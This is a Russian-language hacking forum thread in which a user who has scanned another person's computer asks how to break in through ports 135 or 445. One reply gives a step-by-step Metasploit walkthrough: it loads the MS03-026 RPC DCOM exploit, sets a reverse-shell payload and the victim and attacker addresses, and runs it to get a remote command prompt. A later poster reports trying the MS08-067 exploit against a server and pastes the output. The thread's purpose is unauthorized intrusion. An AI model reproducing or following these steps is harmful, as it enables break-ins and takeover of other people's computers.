Старый 02.08.2009, 15:28   #1
-SH@RK-
RAM 32MB
 
Аватар для -SH@RK-
 
Регистрация: 29.07.2009
Сообщений: 39
-SH@RK- - просто великолепная личность-SH@RK- - просто великолепная личность-SH@RK- - просто великолепная личность-SH@RK- - просто великолепная личность-SH@RK- - просто великолепная личность-SH@RK- - просто великолепная личность-SH@RK- - просто великолепная личность
-SH@RK- вне форума

По умолчанию Взлом через 445 или 135 порт


Народ,кто знает расскажите как хакнуть удалённый комп через 445 или 135 порт.Я просканил одного человека,эти порты открыты.Знаю что это большие дырки,через них можно получить доступ к компу.
В гугле искал,без толку.Везде только спрашивают.Ответов нет.
  Ответить с цитированием
Re: Взлом через 445 или 135 порт
Старый 11.08.2009, 09:50   #2
silver
RAM 256MB
 
Аватар для silver
 
Регистрация: 05.08.2009
Сообщений: 3,531
silver репутация неоспоримаsilver репутация неоспоримаsilver репутация неоспоримаsilver репутация неоспоримаsilver репутация неоспоримаsilver репутация неоспоримаsilver репутация неоспоримаsilver репутация неоспоримаsilver репутация неоспоримаsilver репутация неоспоримаsilver репутация неоспорима
silver вне форума
По умолчанию Re: Взлом через 445 или 135 порт

Поищи может [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.] что то найдешь
  Ответить с цитированием
Re: Взлом через 445 или 135 порт
Старый 12.08.2009, 20:18   #3
student91
RAM 2MB
 
Аватар для student91
 
Регистрация: 12.08.2009
Сообщений: 2
student91 Новичок
student91 вне форума
Wink Re: Взлом через 445 или 135 порт

Цитата:
Сообщение от -SH@RK- Посмотреть сообщение
Народ,кто знает расскажите как хакнуть удалённый комп через 445 или 135 порт.Я просканил одного человека,эти порты открыты.Знаю что это большие дырки,через них можно получить доступ к компу.
В гугле искал,без толку.Везде только спрашивают.Ответов нет.

Пиши в личку kirill-korobiy@yandex.ru
  Ответить с цитированием
Ответ: Re: Взлом через 445 или 135 порт
Старый 03.11.2010, 21:25   #4
student91
RAM 2MB
 
Аватар для student91
 
Регистрация: 12.08.2009
Сообщений: 2
student91 Новичок
student91 вне форума
По умолчанию Ответ: Re: Взлом через 445 или 135 порт

Можешь воспользоваться Metasploit Framework – это среда, предназначенная для разработки и тестирования эксплоитов. Незнаешь что такое эксплоит найди в поисковике «поисковик лучший инструмент хакера».Если разобрался качай Metasploit Framework как раз то, что нам нужно, качай последнюю версию с [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.] распространяется бесплатно.
Если скачал, установка проста, запускаем exe - файл жмем кнопку « Next ». Когда MFS установиться, запустится окно MFSConsole , не торопись его закрывать, подожди пока в нем не появиться консоль mfs >, после этого можешь нажимать « Finish ». Работать с консолью легко, главное привыкнуть и выучить несколько команд.
Будем использовать дыру RPC DCOM-Dcom(кто в танке) это удаленная консоль. Дыра работает на 135***8209;ом UDP***8209;порту (ЕСЛИ ТЫ ПРОСКАНИЛ И НАШЕЛ 135***8209;й TCP ПОРТ, ТО У ТЕБЯ НИЧЕГО НЕ ПОЛУЧИТЬСЯ), я предпочитаю сканить XSpider-ом выбираем раздел «Поиск», вводим диапазон IP -адресов, указываем порт 135, жмем кнопку «Старт». IP -адреса помеченные крестиком – потенциальные жертвы. Теперь вернемся в консоль эксплойта . Вводим команду show exploits. Для нашей задачи понадобиться эксплоит msrpc _ dcom _ms 03_026. Теперь печатаем команду use msrpc _ dcom _ ms 03_026(только не надо копировать и вставлять в свою консоль) так мы переедем в среду exploita(эксплойта) кстати, если ты начинающий начни с изучения английского языка, хватит, отклонений от темы продолжаем…… Командой show options получим список опций, необходимых для успешной работы. Теперь вводим действие, которое должно сделать эксплойт show PAYLOAD winreverse. Осталось ввести адрес жертвы, делается это командой set RHOST 192.16.XX.X и командой set LHOST 172.19.XX.x задаем свой ip – адрес, который можно найти, сделав двойной клик по двум мониторчикам в закладке «Сведения». Свершилось чудо эксплойт готов. Запускается он командой exploit и если система у жертвы не пропатчена(опять для тех кто в танке тоесть не обновлена) или не защищена ты получаешь доступ к командной строке удаленного компьютера, на экране высветится C: WINDOWS system 32>_. Дальше твоя фонтазия и энтузиазм”если ты знаком с командной строкой” .
Student91.:35:
  Ответить с цитированием
Ответ: Взлом через 445 или 135 порт
Старый 03.11.2010, 22:40   #5
Texnar
RAM 128MB
 
Аватар для Texnar
 
Регистрация: 23.09.2010
Сообщений: 143
Texnar на пути к лучшему
Texnar вне форума
По умолчанию Ответ: Взлом через 445 или 135 порт

Статья хорошая, и очень полезная, но после команды show exploits не увидел msrpc _ dcom _ms 03_026 у себя в списке

Добавлено через 4 минуты 38 секунд
при использовании другого сплоита в Moduke Output написало

22:32:27 - Initialized the Metasploit Framework GUI.
22:45:03 - ms08_067_netapi[*] Launching exploit windows/smb/ms08_067_netapi...
22:45:06 - ms08_067_netapi[*] Started reverse handler
22:45:12 - ms08_067_netapi[*] Automatically detecting the target...
22:45:13 - ms08_067_netapi[*] Fingerprint: Windows 2008 Enterprise Service Pack 1 - lang:Unknown
22:45:13 - ms08_067_netapi[*] Could not determine the exact language pack
подскажите что я делаю не так?
  Ответить с цитированием
Последний раз редактировалось Texnar; 03.11.2010 в 22:40. Причина: Добавлено сообщение
Ответ: Взлом через 445 или 135 порт
Старый 07.11.2010, 23:32   #6
jone21
RAM 8MB
 
Аватар для jone21
 
Регистрация: 11.01.2010
Сообщений: 10
jone21 Новичок
jone21 вне форума
По умолчанию Ответ: Взлом через 445 или 135 порт

похоту на том кампе стоит обнавление и этот сплоит не действует
  Ответить с цитированием
Ответ: Взлом через 445 или 135 порт
Старый 08.11.2010, 18:57   #7
Texnar
RAM 128MB
 
Аватар для Texnar
 
Регистрация: 23.09.2010
Сообщений: 143
Texnar на пути к лучшему
Texnar вне форума
По умолчанию Ответ: Взлом через 445 или 135 порт

Как оказалось позже это сервак и на нем висит сайт КС(заходил на 80 порт)
  Ответить с цитированием
Ответ: Взлом через 445 или 135 порт
Старый 23.11.2010, 00:33   #8
mironich
RAM 256MB
 
Аватар для mironich
 
Регистрация: 22.11.2010
Сообщений: 2,026
mironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личность
mironich вне форума
По умолчанию Ответ: Взлом через 445 или 135 порт

Помойму уязвимость давно не актуальна почти везде ее залотали..
  Ответить с цитированием
Ответ: Взлом через 445 или 135 порт
Старый 23.11.2010, 18:03   #9
Texnar
RAM 128MB
 
Аватар для Texnar
 
Регистрация: 23.09.2010
Сообщений: 143
Texnar на пути к лучшему
Texnar вне форума
По умолчанию Ответ: Взлом через 445 или 135 порт

Вроде как еще на SP2 есть, выше уже прикрыли(нашел позже)
  Ответить с цитированием
Ответ: Взлом через 445 или 135 порт
Старый 18.12.2010, 15:07   #10
Mr.John
RAM 8MB
 
Аватар для Mr.John
 
Регистрация: 13.12.2010
Сообщений: 13
Mr.John Новичок
Mr.John вне форума
По умолчанию Ответ: Взлом через 445 или 135 порт

student91. Молодец ты Крут! REspEct AnD ThanX!
  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot